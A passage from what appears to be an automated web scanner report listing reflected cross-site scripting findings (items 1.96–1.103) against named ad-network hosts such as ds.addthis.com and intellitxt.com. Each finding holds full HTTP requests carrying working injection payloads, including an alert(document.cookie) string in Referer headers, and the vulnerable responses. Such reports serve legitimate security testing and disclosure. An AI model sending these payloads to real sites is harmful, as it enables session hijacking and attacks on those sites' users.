Content-Type: text/html
Content-Length: 66796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://downloadsquad.switched.com/2011/02/06/sumatra-pdf-version-1-3-improves-performance-printing/?271c2"><script>alert(1)</script>4f9f1e70ef=1"/>
...[SNIP]...

1.96. http://ds.addthis.com/red/psi/sites/www.politicsdaily.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.politicsdaily.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 49eb5<script>alert(1)</script>c7ecb15712e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.politicsdaily.com/p.json?callback=_ate.ad.hpr49eb5<script>alert(1)</script>c7ecb15712e&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.politicsdaily.com%2F%3F12b75&ref=http%3A%2F%2Fburp%2Fshow%2F54&j0hyy0 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296924137.60|1296659685.66; dt=X; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 287
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 06 Feb 2011 20:54:00 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 08 Mar 2011 20:54:00 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1297025640.60|1296659685.66; Domain=.addthis.com; Expires=Tue, 05-Feb-2013 15:18:51 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 06 Feb 2011 20:54:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:54:00 GMT
Connection: close

_ate.ad.hpr49eb5<script>alert(1)</script>c7ecb15712e({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.politicsdaily.com%2f%3f12b75"],"segments" : ["60"],"loc": "MjAwMDFOQ
...[SNIP]...

1.97. http://electronista.us.intellitxt.com/al.asp [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://electronista.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b6498%3balert(1)//8fbb8eb7701 was submitted in the jscallback parameter. This input was echoed as b6498;alert(1)//8fbb8eb7701 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110206203844&adid=0%2C126828&cc=us&di=29608951%2C29848200&hk=1&ipid=10231&mh=e096018077ddee628d1f0595aa706535&pid=2%2C2&pvm=21312d264a07f4ba843782fa6a49ed66&pvu=24D1B162B3D74248ACE40AC0B07FDF87&rcc=us&so=0&syid=0%2C0&uf=0%2C0&ur=0%2C0&kp=0%2C0%3B186%2C578%3B&prf=ll%3A670%7Cintl%3A889%7Cpreprochrome%3A3%7Cgetconchrome%3A58%7Ccontint%3A112%7Ccontl%3A1064%7Cadvint%3A118%7Cadvl%3A1183%7Ctl%3A1393&jscallback=$iTXT.js.callback4b6498%3balert(1)//8fbb8eb7701 HTTP/1.1
Host: electronista.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6wEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACssBAAAAAwAAAS33y8OgAAABLffa/2wAAAEt99tmFQAAD6YBAAAAAgAAAS332v9sAAABLffbZhUAAAroAQAAAAEAAAEt98vDoAAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAhI/yng--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: text/javascript
Content-Length: 65
Date: Sun, 06 Feb 2011 20:37:47 GMT
Connection: close

try{$iTXT.js.callback4b6498;alert(1)//8fbb8eb7701();}catch(e){}

1.98. http://electronista.us.intellitxt.com/iframescript.jsp [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://electronista.us.intellitxt.com
Path:   /iframescript.jsp

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1da7"><script>alert(1)</script>24a46bbb395 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2784%2C329%2C2776%2C4004%26type%3Dscript%26ipid%3D10231%26sfid%3D0e1da7"><script>alert(1)</script>24a46bbb395 HTTP/1.1
Host: electronista.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6wEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACssBAAAAAwAAAS33y8OgAAABLffa/2wAAAEt99tmFQAAD6YBAAAAAgAAAS332v9sAAABLffbZhUAAAroAQAAAAEAAAEt98vDoAAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAhI/yng--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: text/html
Content-Length: 204
Date: Sun, 06 Feb 2011 20:37:40 GMT
Connection: close

<html><body><script src="http://pixel.intellitxt.com/pixel.jsp?id=2784,329,2776,4004&type=script&ipid=10231&sfid=0e1da7"><script>alert(1)</script>24a46bbb395" language="javascript"></script></body></h
...[SNIP]...

1.99. http://electronista.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://electronista.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e22c2'-alert(1)-'8d2186b5fd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=10231&e22c2'-alert(1)-'8d2186b5fd6=1 HTTP/1.1
Host: electronista.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wkAAAEt+/O1yQA-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEPqgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Thu, 07-Apr-2011 20:36:58 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEPqgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Thu, 07-Apr-2011 20:36:58 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:36:58 GMT
Connection: close
Content-Length: 10716

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
qoptions={tags:"889.5259.10231"};_qacct="p-fdwEfW0hIeH9U";$iTXT.js.load("http://edge.quantserve.com/quant.js");$iTXT.js.serverUrl='http://electronista.us.intellitxt.com';$iTXT.js.pageQuery='ipid=10231&e22c2'-alert(1)-'8d2186b5fd6=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

1.100. http://electronista.us.intellitxt.com/v4/advert [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://electronista.us.intellitxt.com
Path:   /v4/advert

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1c7b2%3balert(1)//fc98b5440bb was submitted in the jscallback parameter. This input was echoed as 1c7b2;alert(1)//fc98b5440bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/advert?ts=1297024724535&refurl=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&sid=e096018077ddee628d1f0595aa706535&pvu=24D1B162B3D74248ACE40AC0B07FDF87&pvm=21312d264a07f4ba843782fa6a49ed66&ipid=10231&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&dat=61%2C69%2C67%2C17%2C25%2C13%2C62%2C26%2C11%2C34%2C4%2C12%2C50%2C51%2C18%2C61&jscallback=$iTXT.js.callback31c7b2%3balert(1)//fc98b5440bb HTTP/1.1
Host: electronista.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEMMAA-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 20:37:42 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:37:41 GMT
Connection: close
Content-Length: 4915

(function(){var nh = new $iTXT.ui.Hook({value: "iphone",uid: "681C2C358D4E49A28512ECFA3DED1626",uidh: "5b94fa4e6337160336acb19c5caaf7ed",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT.tmpl.
...[SNIP]...
XT.glob.track.hook'));$iTXT.glob.track.hook.push(new $iTXT.data.Pixel(19827374,'iphone','http://pixel.intellitxt.com/pixel.jsp?id=2776&type=script',true,'$iTXT.glob.track.hook'));try{$iTXT.js.callback31c7b2;alert(1)//fc98b5440bb();}catch(e){}

1.101. http://electronista.us.intellitxt.com/v4/context [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://electronista.us.intellitxt.com
Path:   /v4/context

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e242d%3balert(1)//f9ad150e83d was submitted in the jscallback parameter. This input was echoed as e242d;alert(1)//f9ad150e83d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/context?ts=1297024724423&refurl=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&sid=e096018077ddee628d1f0595aa706535&pvu=24D1B162B3D74248ACE40AC0B07FDF87&pvm=21312d264a07f4ba843782fa6a49ed66&ipid=10231&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&dat=61%2C69%2C67%2C17%2C25%2C13%2C62%2C26%2C11%2C34%2C4%2C12%2C50%2C51%2C18%2C61&pagecl=18113&jsoncl=1262&ppc=-1&hn=7&chunkkey=10231:e096018077ddee628d1f0595aa706535:4CD59B7A613C41A19879C8AC98480C80:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%22We%20have%20noticed%20that%20you%20are%20using%20iPhone%20for%20browsing%20our%20website.%20Would%20you%20like%20to%20browse%20our%22%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A2%2Cc%3A%22Toshiba%20has%20sold%20about%20half%20of%20what%20it%20expected%20to%20of%20its%22%7D%2C%7Bt%3A%22std%22%2Cn%3A3%2Cc%3A%22in%20Japan%2C%22%7D%2C%7Bt%3A%22std%22%2Cn%3A4%2Cc%3A%22Masaaki%20Osumi%2C%20the%20president%20of%20Toshiba%25E2%2580%2599s%20Visual%20Products%20Company.%20Only%20500%20of%20the%2020-inch%2C%20%242%2C490%20set%20were%20sold%20in%20the%20first%20month%20and%20even%20less%20of%20the%20less%20expensive%2012-inch%20model.%20Toshiba%20expected%20to%20move%201%2C000%20of%20each%20model%20during%20their%20first%20month%20of%20sales.%22%7D%5D%7D%2C%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A5%2Cc%3A%22Osumi%20continued%2C%20saying%20the%20company%20needs%20to%20offer%20larger%20sizes%20of%20the%20sets%20in%20order%20to%20boost%20sales.%20Technical%20challenges%20need%20to%20be%20overcome%20first%2C%20however%2C%20before%20the%20company%20can%20do%20so%20in%20the%20second%20half%20of%20the%20year.%22%7D%2C%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A6%2Cc%3A%22To%20creat&chunk=0&total=2&jscallback=$iTXT.js.callback1e242d%3balert(1)//f9ad150e83d HTTP/1.1
Host: electronista.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEMMAA-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Content-Length: 63
Date: Sun, 06 Feb 2011 20:37:42 GMT
Connection: close

try{$iTXT.js.callback1e242d;alert(1)//f9ad150e83d();}catch(e){}

1.102. http://electronista.us.intellitxt.com/v4/init [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://electronista.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ea68b%3balert(1)//0780825101d was submitted in the jscallback parameter. This input was echoed as ea68b;alert(1)//0780825101d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1297024724141&pagecl=18113&fv=10&muid=&refurl=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&ipid=10231&jscallback=$iTXT.js.callback0ea68b%3balert(1)//0780825101d HTTP/1.1
Host: electronista.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEMMAA-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 20:37:44 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:37:43 GMT
Content-Length: 11484

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback0ea68b;alert(1)//0780825101d({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

1.103. http://electronista.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://electronista.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbbb8"-alert(1)-"b15924c4453 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1297024724141&pagecl=18113&fv=10&muid=&refurl=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&ipid=10231&jscallback=$iTXT.js.callback0&fbbb8"-alert(1)-"b15924c4453=1 HTTP/1.1
Host: electronista.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEMMAA-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 20:37:44 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:37:43 GMT
Content-Length: 11465

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
